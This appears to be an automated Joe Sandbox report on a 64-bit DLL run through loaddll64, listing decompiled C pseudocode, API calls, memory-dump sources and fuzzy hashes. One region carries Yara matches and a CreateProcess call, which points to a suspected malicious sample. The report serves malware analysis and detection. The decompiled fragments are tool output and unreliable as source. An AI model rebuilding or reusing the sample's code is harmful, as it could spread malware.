                                                                                                      • Instruction Fuzzy Hash: 0FE01A52E2C18685FF282671E1523BA27A03F17381F8400B9DD7E471C3CE0DA5DA6532
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C113F70() {
                                                                                                      				long long _v24;
                                                                                                      				long long _t5;
                                                                                                      				intOrPtr _t7;
                                                                                                      
                                                                                                      				_v24 = 0;
                                                                                                      				_t7 =  *0x7c17fdd8; // 0x180000000
                                                                                                      				E00007FF87FF87C119600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                      				_v24 = _t5;
                                                                                                      				ExitProcess(??);
                                                                                                      			}






                                                                                                      0x7ff87c113f74
                                                                                                      0x7ff87c113f84
                                                                                                      0x7ff87c113f92
                                                                                                      0x7ff87c113f97
                                                                                                      0x7ff87c113f9c

                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExitProcess
                                                                                                      • String ID: DllRegisterServer
                                                                                                      • API String ID: 621844428-1663957109
                                                                                                      • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                      • Instruction ID: f1438bc55ff8400822956c4fc459d13531d20ed799397f9490e5c54582c86000
                                                                                                      • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                      • Instruction Fuzzy Hash: 60D09E72928A82C2E720DB50F84539A63B4FB8A388FC00136D58C47664DF3CD39ACB64
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10DEA8(void* __ecx, long long __rbx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                      				signed char _t53;
                                                                                                      				signed int _t54;
                                                                                                      				void* _t73;
                                                                                                      				long long _t77;
                                                                                                      				intOrPtr _t78;
                                                                                                      				void* _t95;
                                                                                                      				long _t98;
                                                                                                      
                                                                                                      				_t73 = _t95;
                                                                                                      				 *((long long*)(_t73 + 8)) = __rbx;
                                                                                                      				 *((long long*)(_t73 + 0x10)) = __rbp;
                                                                                                      				 *((long long*)(_t73 + 0x18)) = __rsi;
                                                                                                      				 *((long long*)(_t73 + 0x20)) = __rdi;
                                                                                                      				r14d = 0;
                                                                                                      				_t77 =  *((intOrPtr*)(0x7ff87c17f968)) + 2;
                                                                                                      				if (_t77 - 1 <= 0) goto 0x7c10defb;
                                                                                                      				 *0x7FF87C17F978 =  *0x7FF87C17F978 | 0x00000080;
                                                                                                      				goto 0x7c10df86;
                                                                                                      				 *0x7FF87C17F978 = 0x81;
                                                                                                      				if (0 == 0) goto 0x7c10df1c;
                                                                                                      				if (0 == 0) goto 0x7c10df15;
                                                                                                      				goto 0x7c10df21;
                                                                                                      				goto 0x7c10df21;
                                                                                                      				GetStdHandle(_t98);
                                                                                                      				_t21 = _t77 + 1; // 0x1
                                                                                                      				if (_t21 - 1 <= 0) goto 0x7c10df61;
                                                                                                      				_t53 = GetFileType(??); // executed
                                                                                                      				if (_t53 == 0) goto 0x7c10df61;
                                                                                                      				_t54 = _t53 & 0x000000ff;
                                                                                                      				 *((long long*)(0x7ff87c17f968)) = _t77;
                                                                                                      				if (_t54 != 2) goto 0x7c10df55;
                                                                                                      				 *0x7FF87C17F978 =  *0x7FF87C17F978 | 0x00000040;
                                                                                                      				goto 0x7c10df86;
                                                                                                      				if (_t54 != 3) goto 0x7c10df86;
                                                                                                      				 *0x7FF87C17F978 =  *0x7FF87C17F978 | 0x00000008;
                                                                                                      				goto 0x7c10df86;
                                                                                                      				 *0x7FF87C17F978 =  *0x7FF87C17F978 | 0x00000040;
                                                                                                      				 *((long long*)( *0x7FF881EED6A8 + 0x28)) = 0xfffffffe;
                                                                                                      				_t78 =  *0x7c17fd78; // 0x0
                                                                                                      				if (_t78 == 0) goto 0x7c10df86;
                                                                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t98 + _t78)) + 0x18)) = 0xfffffffe;
                                                                                                      				if (1 != 3) goto 0x7c10dec6;
                                                                                                      				return _t54;
                                                                                                      			}










                                                                                                      0x7ff87c10dea8
                                                                                                      0x7ff87c10deab
                                                                                                      0x7ff87c10deaf
                                                                                                      0x7ff87c10deb3
                                                                                                      0x7ff87c10deb7
                                                                                                      0x7ff87c10dec3
                                                                                                      0x7ff87c10dee7
                                                                                                      0x7ff87c10deef
                                                                                                      0x7ff87c10def1
                                                                                                      0x7ff87c10def6
                                                                                                      0x7ff87c10defb
                                                                                                      0x7ff87c10df04
                                                                                                      0x7ff87c10df09
                                                                                                      0x7ff87c10df13
                                                                                                      0x7ff87c10df1a
                                                                                                      0x7ff87c10df21
                                                                                                      0x7ff87c10df2a
                                                                                                      0x7ff87c10df32
                                                                                                      0x7ff87c10df37
                                                                                                      0x7ff87c10df3f
                                                                                                      0x7ff87c10df41
                                                                                                      0x7ff87c10df44
                                                                                                      0x7ff87c10df4c
                                                                                                      0x7ff87c10df4e
                                                                                                      0x7ff87c10df53
                                                                                                      0x7ff87c10df58
                                                                                                      0x7ff87c10df5a
                                                                                                      0x7ff87c10df5f
                                                                                                      0x7ff87c10df61
                                                                                                      0x7ff87c10df66
                                                                                                      0x7ff87c10df6f
                                                                                                      0x7ff87c10df79
                                                                                                      0x7ff87c10df7f
                                                                                                      0x7ff87c10df8f
                                                                                                      0x7ff87c10dfaf

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileHandleType
                                                                                                      • String ID:
                                                                                                      • API String ID: 3000768030-0
                                                                                                      • Opcode ID: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                      • Instruction ID: 7746bda79b533f88206d4906d7c1102356845ae653a7050fb36ad7b287af60b0
                                                                                                      • Opcode Fuzzy Hash: 8195fa56953df887960c625c907aa558cd447f31b22e017c21e87f709c57afde
                                                                                                      • Instruction Fuzzy Hash: 16318123A28B5681EB609B24C5802796750FB46BF0B685379EB7E473E0CF38E4D2C311
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 68%
                                                                                                      			E00007FF87FF87C10A9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                      				int _t1;
                                                                                                      				intOrPtr _t3;
                                                                                                      				void* _t4;
                                                                                                      				void* _t11;
                                                                                                      				intOrPtr _t14;
                                                                                                      
                                                                                                      				if (__rcx == 0) goto 0x7c10aa17;
                                                                                                      				_t14 =  *0x7c17f930; // 0x2c3217d0000, executed
                                                                                                      				_t1 = HeapFree(_t11, ??); // executed
                                                                                                      				if (_t1 != 0) goto 0x7c10aa12;
                                                                                                      				_t3 = E00007FF87FF87C10B34C(GetLastError(), __rax, _t14, __rcx);
                                                                                                      				_t4 = E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = _t3;
                                                                                                      				return _t4;
                                                                                                      			}








                                                                                                      0x7ff87c10a9df
                                                                                                      0x7ff87c10a9eb
                                                                                                      0x7ff87c10a9f2
                                                                                                      0x7ff87c10a9fa
                                                                                                      0x7ff87c10aa04
                                                                                                      0x7ff87c10aa0b
                                                                                                      0x7ff87c10aa10
                                                                                                      0x7ff87c10aa17

                                                                                                      APIs
                                                                                                      • RtlReleasePrivilege.NTDLL(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9F2
                                                                                                      • GetLastError.KERNEL32(?,?,00000000,00007FF87C10F492,?,?,?,00007FF87C10F4CF,?,?,00000000,00007FF87C10F144,?,?,?,00007FF87C10F077), ref: 00007FF87C10A9FC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastPrivilegeRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1334314998-0
                                                                                                      • Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                      • Instruction ID: 315c49d4bdb5fe71037c58089e285cad25c231130464e87717976a271b5ff553
                                                                                                      • Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
                                                                                                      • Instruction Fuzzy Hash: 04E08C12F3920282FF08ABB2D8453791190AF86BC4F445038DC1D87392EE2CB8C54334
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.319740292.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: CreateProcess
                                                                                                      • String ID:
                                                                                                      • API String ID: 963392458-0
                                                                                                      • Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
                                                                                                      • Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
                                                                                                      • Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 50%
                                                                                                      			E00007FF87FF87C1022B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
                                                                                                      				long long _v16;
                                                                                                      				signed char _v24;
                                                                                                      				intOrPtr* _t48;
                                                                                                      				intOrPtr* _t50;
                                                                                                      
                                                                                                      				_t48 = __rax;
                                                                                                      				_a24 = r8b;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C102830(__rax, _a8);
                                                                                                      				if (_t48 - _a16 >= 0) goto 0x7c1022de;
                                                                                                      				E00007FF87FF87C102230(_a8);
                                                                                                      				E00007FF87FF87C102150(_t48, _a8);
                                                                                                      				if ( *_t48 - _a16 >= 0) goto 0x7c102310;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				E00007FF87FF87C102600(_a8, _a16,  *_t48); // executed
                                                                                                      				goto 0x7c10237a;
                                                                                                      				if ((_a24 & 0x000000ff) == 0) goto 0x7c102366;
                                                                                                      				if (_a16 - 0x10 >= 0) goto 0x7c102366;
                                                                                                      				E00007FF87FF87C102170(_t48, _a8);
                                                                                                      				if (_a16 -  *_t48 >= 0) goto 0x7c102341;
                                                                                                      				_t50 = _a16;
                                                                                                      				_v16 = _t50;
                                                                                                      				goto 0x7c102353;
                                                                                                      				E00007FF87FF87C102170(_t50, _a8);
                                                                                                      				_v16 =  *_t50;
                                                                                                      				E00007FF87FF87C101910(1,  *_t50, _a8, _v16);
                                                                                                      				goto 0x7c10237a;
                                                                                                      				if (_a16 != 0) goto 0x7c10237a;
                                                                                                      				E00007FF87FF87C1023A0( *_t50, _a8, _a16);
                                                                                                      				if (_a16 <= 0) goto 0x7c10238c;
                                                                                                      				_v24 = 1;
                                                                                                      				goto 0x7c102394;
                                                                                                      				_v24 = 0;
                                                                                                      				return _v24 & 0x000000ff;
                                                                                                      			}







                                                                                                      0x7ff87c1022b0
                                                                                                      0x7ff87c1022b0
                                                                                                      0x7ff87c1022b5
                                                                                                      0x7ff87c1022ba
                                                                                                      0x7ff87c1022c8
                                                                                                      0x7ff87c1022d2
                                                                                                      0x7ff87c1022d9
                                                                                                      0x7ff87c1022e3
                                                                                                      0x7ff87c1022f0
                                                                                                      0x7ff87c1022f7
                                                                                                      0x7ff87c102309
                                                                                                      0x7ff87c10230e
                                                                                                      0x7ff87c102317
                                                                                                      0x7ff87c10231f
                                                                                                      0x7ff87c102326
                                                                                                      0x7ff87c102333
                                                                                                      0x7ff87c102335
                                                                                                      0x7ff87c10233a
                                                                                                      0x7ff87c10233f
                                                                                                      0x7ff87c102346
                                                                                                      0x7ff87c10234e
                                                                                                      0x7ff87c10235f
                                                                                                      0x7ff87c102364
                                                                                                      0x7ff87c10236c
                                                                                                      0x7ff87c102375
                                                                                                      0x7ff87c102380
                                                                                                      0x7ff87c102382
                                                                                                      0x7ff87c10238a
                                                                                                      0x7ff87c10238c
                                                                                                      0x7ff87c10239d

                                                                                                      APIs
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10283E
                                                                                                        • Part of subcall function 00007FF87C102830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FF87C10284B
                                                                                                      • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FF87C1022D9
                                                                                                        • Part of subcall function 00007FF87C102170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C10217E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
                                                                                                      • String ID:
                                                                                                      • API String ID: 1903167320-0
                                                                                                      • Opcode ID: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                      • Instruction ID: fe5dc983a2c4239ecb9ed9513a2c21b8828779d885dfaf32564948bec0898d79
                                                                                                      • Opcode Fuzzy Hash: aff1851cebf3f965b07721a628662be7775e5ed75af6ef4fe029cf6c3e1b761c
                                                                                                      • Instruction Fuzzy Hash: 2B21CE2392CA4181EB249B15E45036EA770FBCB7C4F604476EB9D4B6AACF3DD5C08B60
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10AAD0(void* __eax, signed int __rcx, signed int __rdx) {
                                                                                                      				intOrPtr* _t22;
                                                                                                      				signed int _t29;
                                                                                                      
                                                                                                      				_t29 = __rdx;
                                                                                                      				if (__rcx == 0) goto 0x7c10aaef;
                                                                                                      				_t1 = _t29 - 0x20; // -32
                                                                                                      				_t22 = _t1;
                                                                                                      				if (_t22 - __rdx < 0) goto 0x7c10ab32;
                                                                                                      				_t25 =  ==  ? _t22 : __rcx * __rdx;
                                                                                                      				goto 0x7c10ab16;
                                                                                                      				if (E00007FF87FF87C10E958() == 0) goto 0x7c10ab32;
                                                                                                      				if (E00007FF87FF87C1097EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x7c10ab32;
                                                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                      				if (_t22 == 0) goto 0x7c10ab01;
                                                                                                      				goto 0x7c10ab3f;
                                                                                                      				E00007FF87FF87C10B420(_t22);
                                                                                                      				 *_t22 = 0xc;
                                                                                                      				return 0;
                                                                                                      			}





                                                                                                      0x7ff87c10aad0
                                                                                                      0x7ff87c10aadf
                                                                                                      0x7ff87c10aae3
                                                                                                      0x7ff87c10aae3
                                                                                                      0x7ff87c10aaed
                                                                                                      0x7ff87c10aafb
                                                                                                      0x7ff87c10aaff
                                                                                                      0x7ff87c10ab08
                                                                                                      0x7ff87c10ab14
                                                                                                      0x7ff87c10ab25
                                                                                                      0x7ff87c10ab2e
                                                                                                      0x7ff87c10ab30
                                                                                                      0x7ff87c10ab32
                                                                                                      0x7ff87c10ab37
                                                                                                      0x7ff87c10ab44

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF87C10BAAE,?,?,?,00007FF87C10B429,?,?,?,?,00007FF87C110426,?,?,00000000), ref: 00007FF87C10AB25
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                      • Instruction ID: 6fff5df721f1ae3aad7e9e5b2aa6b7d564a220ce2e5cd2403da9931c6a7d68a5
                                                                                                      • Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
                                                                                                      • Instruction Fuzzy Hash: 16F06D07B2A60781FF589B62D4113B512867F5ABC4F4C9030CD2E873C1ED2CE8C18230
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 37%
                                                                                                      			E00007FF87FF87C10AA18(intOrPtr* __rax, void* __rcx) {
                                                                                                      
                                                                                                      				if (__rcx - 0xffffffe0 > 0) goto 0x7c10aa63;
                                                                                                      				_t16 =  ==  ? __rax : __rcx;
                                                                                                      				goto 0x7c10aa4a;
                                                                                                      				if (E00007FF87FF87C10E958() == 0) goto 0x7c10aa63;
                                                                                                      				if (E00007FF87FF87C1097EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x7c10aa63;
                                                                                                      				RtlAllocateHeap(??, ??, ??); // executed
                                                                                                      				if (__rax == 0) goto 0x7c10aa35;
                                                                                                      				goto 0x7c10aa70;
                                                                                                      				E00007FF87FF87C10B420(__rax);
                                                                                                      				 *__rax = 0xc;
                                                                                                      				return 0;
                                                                                                      			}



                                                                                                      0x7ff87c10aa25
                                                                                                      0x7ff87c10aa2f
                                                                                                      0x7ff87c10aa33
                                                                                                      0x7ff87c10aa3c
                                                                                                      0x7ff87c10aa48
                                                                                                      0x7ff87c10aa56
                                                                                                      0x7ff87c10aa5f
                                                                                                      0x7ff87c10aa61
                                                                                                      0x7ff87c10aa63
                                                                                                      0x7ff87c10aa68
                                                                                                      0x7ff87c10aa75

                                                                                                      APIs
                                                                                                      • RtlAllocateHeap.NTDLL(?,?,?,00007FF87C11040D,?,?,00000000,00007FF87C10D8B7,?,?,?,00007FF87C10A427,?,?,?,00007FF87C10A31D), ref: 00007FF87C10AA56
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AllocateHeap
                                                                                                      • String ID:
                                                                                                      • API String ID: 1279760036-0
                                                                                                      • Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                      • Instruction ID: d8a3c5ea84fbd7d79ab6afdc99c80225032a6ead74fcb5c3d0285862c6282d09
                                                                                                      • Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
                                                                                                      • Instruction Fuzzy Hash: 0FF0F813E2D20789FF645B62DA5237511806F8ABE0F084630EC3E8B3C1DE6CE5C14630
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 44%
                                                                                                      			E00007FF87FF87C101540(long long __rcx, long long _a8) {
                                                                                                      				long long _v24;
                                                                                                      				intOrPtr* _t9;
                                                                                                      				long long _t13;
                                                                                                      
                                                                                                      				_a8 = __rcx;
                                                                                                      				_v24 = 0xfffffffe;
                                                                                                      				r8d = 0;
                                                                                                      				E00007FF87FF87C101910(1, _t9, _a8, _t13); // executed
                                                                                                      				return E00007FF87FF87C1017A0(_a8);
                                                                                                      			}






                                                                                                      0x7ff87c101540
                                                                                                      0x7ff87c101549
                                                                                                      0x7ff87c101552
                                                                                                      0x7ff87c10155c
                                                                                                      0x7ff87c101571

                                                                                                      APIs
                                                                                                      • Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C101567
                                                                                                        • Part of subcall function 00007FF87C1017A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FF87C1017B1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Concurrency::details::EmptyQueue::StructuredWork
                                                                                                      • String ID:
                                                                                                      • API String ID: 1865873047-0
                                                                                                      • Opcode ID: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                      • Instruction ID: c98134ac12c966fbf0033540b0bd2940a53be8914c71760c7350c6c4ee6fd024
                                                                                                      • Opcode Fuzzy Hash: 162d5b836d3a2cf9bbde74f51cfd96032ed20fc03a3f05e88ec8900bcc2c8201
                                                                                                      • Instruction Fuzzy Hash: 0CD09E2393898181D610AB24E85655E6720F7D33B4FB05734FABD03AE5CE2ED5958B04
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 44%
                                                                                                      			E00007FF87FF87C101B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
                                                                                                      				void* _t7;
                                                                                                      				void* _t8;
                                                                                                      
                                                                                                      				_t8 = __rax;
                                                                                                      				_a16 = __rdx;
                                                                                                      				_a8 = __rcx;
                                                                                                      				E00007FF87FF87C1011A0(_a16);
                                                                                                      				_t7 = E00007FF87FF87C101B40(_t8, _a8, _a16, _t8); // executed
                                                                                                      				return _t7;
                                                                                                      			}





                                                                                                      0x7ff87c101b10
                                                                                                      0x7ff87c101b10
                                                                                                      0x7ff87c101b15
                                                                                                      0x7ff87c101b23
                                                                                                      0x7ff87c101b35
                                                                                                      0x7ff87c101b3e

                                                                                                      APIs
                                                                                                      • char_traits.LIBCPMTD ref: 00007FF87C101B23
                                                                                                        • Part of subcall function 00007FF87C101B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FF87C101B6E
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.320772134.00007FF87C101000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF87C100000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.320766962.00007FF87C100000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.320862895.00007FF87C138000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321029693.00007FF87C17E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321047059.00007FF87C182000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321052496.00007FF87C185000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.321064370.00007FF87C187000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ff87c100000_loaddll64.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
                                                                                                      • String ID:
                                                                                                      • API String ID: 1444011685-0
